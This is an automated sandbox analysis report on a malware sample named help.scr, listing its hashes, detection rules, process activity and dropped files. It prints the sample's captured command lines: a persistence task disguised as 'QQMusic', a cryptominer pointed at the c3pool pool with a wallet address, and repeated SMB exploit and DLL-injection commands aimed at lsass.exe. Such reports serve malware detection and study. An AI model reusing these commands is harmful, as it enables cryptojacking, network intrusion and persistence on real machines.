Summary | ZeroBOX

help.scr

Emotet, Generic Malware, Malicious Library, Antivirus, UPX, Malicious Packer, ftp, PE File, PE64, DLL, OS Processor Check, PE32
Category FILE
Machine s1_win7_x6401
Started June 15, 2024, 8:16 a.m.
Completed June 15, 2024, 8:19 a.m.
Size 9.0MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5315d928cff19507f66d59b174280e8a
SHA256 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
CRC32 B03E60A2
ssdeep 196608:rhHMBGC3PtXtT+Was86wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G07wuwasMdJOnZKVSaaNZOn
Yara
  • Malicious_Packer_Zero - Malicious Packer
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

  • cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

    PID 3032
  • cmd.exe cmd /c taskkill /f /im spreadEmnopq.exe&&exit

    PID 2072
  • spreadEmnopq.exe C:\ProgramData\spreadEmnopq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p WPU --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

    PID 2528
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3556
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3592
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3688
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3772
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3848
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3920
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 4000
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3188
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3680
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3948
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3596
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3808
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3852
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3656
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3716
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 4012
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 3384
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 4164
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 4288
  • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    PID 4352

IP Address Status Action
164.124.101.2 Active Moloch
47.76.164.119 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "QQMusic" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "spreadEmnopq.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Authcode: 0xa2b16704
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] XorMask: 0x60
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (RunPlugin)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (processParams)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Authcode: 0x31bd9308
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] XorMask: 0x7a
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (RunPlugin)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (processParams)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Authcode: 0x4ba8ff0f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] XorMask: 0xf7
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
section .giats
resource name LNK
resource name SMB
resource name X64
resource name X86
suspicious_features Connection to IP address suspicious_request OPTIONS http://192.168.56.1/
suspicious_features Connection to IP address suspicious_request OPTIONS http://192.168.56.1/ipc$
request OPTIONS http://192.168.56.1/
request OPTIONS http://192.168.56.1/ipc$
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001c30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000024f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ab2000
process_handle: 0xffffffff
1 0 0
name LNK language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00874428 size 0x0005d332
name SMB language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00563fa0 size 0x00310484
name X64 language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x003971a0 size 0x0014c800
name X86 language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x004e39a0 size 0x00080600
file C:\ProgramData\pcrecpp-0.dll
file C:\ProgramData\libiconv-2.dll
file C:\ProgramData\posh.dll
file C:\ProgramData\trch-0.dll
file C:\ProgramData\pcre-0.dll
file C:\ProgramData\trfo-2.dll
file C:\ProgramData\riar-2.dll
file C:\ProgramData\pcreposix-0.dll
file C:\ProgramData\coli-0.dll
file C:\ProgramData\tibe-2.dll
file C:\ProgramData\libxml2.dll
file C:\ProgramData\tibe-1.dll
file C:\ProgramData\xdvl-0.dll
file C:\ProgramData\adfw.dll
file C:\ProgramData\cnli-0.dll
file C:\ProgramData\esco-0.dll
file C:\ProgramData\svchostlong.exe
file C:\ProgramData\crli-0.dll
file C:\ProgramData\dmgd-1.dll
file C:\ProgramData\cnli-1.dll
file C:\ProgramData\iconv.dll
file C:\ProgramData\tucl-1.dll
file C:\ProgramData\svchostromance.exe
file C:\ProgramData\exma-1.dll
file C:\ProgramData\etchCore-0.x64.dll
file C:\ProgramData\etch-0.dll
file C:\ProgramData\etchCore-0.x86.dll
file C:\ProgramData\tibe.dll
file C:\ProgramData\posh-0.dll
file C:\ProgramData\etebCore-2.x86.dll
file C:\ProgramData\trfo.dll
file C:\ProgramData\tucl.dll
file C:\ProgramData\X86.dll
file C:\ProgramData\adfw-2.dll
file C:\ProgramData\libcurl.dll
file C:\ProgramData\exma.dll
file C:\ProgramData\zibe.dll
file C:\ProgramData\trfo-0.dll
file C:\ProgramData\riar.dll
file C:\ProgramData\zlib1.dll
file C:\ProgramData\serverlong.exe
file C:\ProgramData\ssleay32.dll
file C:\ProgramData\pcla-0.dll
file C:\ProgramData\eteb-2.dll
file C:\ProgramData\libeay32.dll
file C:\ProgramData\dmgd-4.dll
file C:\ProgramData\etebCore-2.x64.dll
file C:\ProgramData\X64.dll
file C:\ProgramData\trch.dll
file C:\ProgramData\trch-1.dll
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
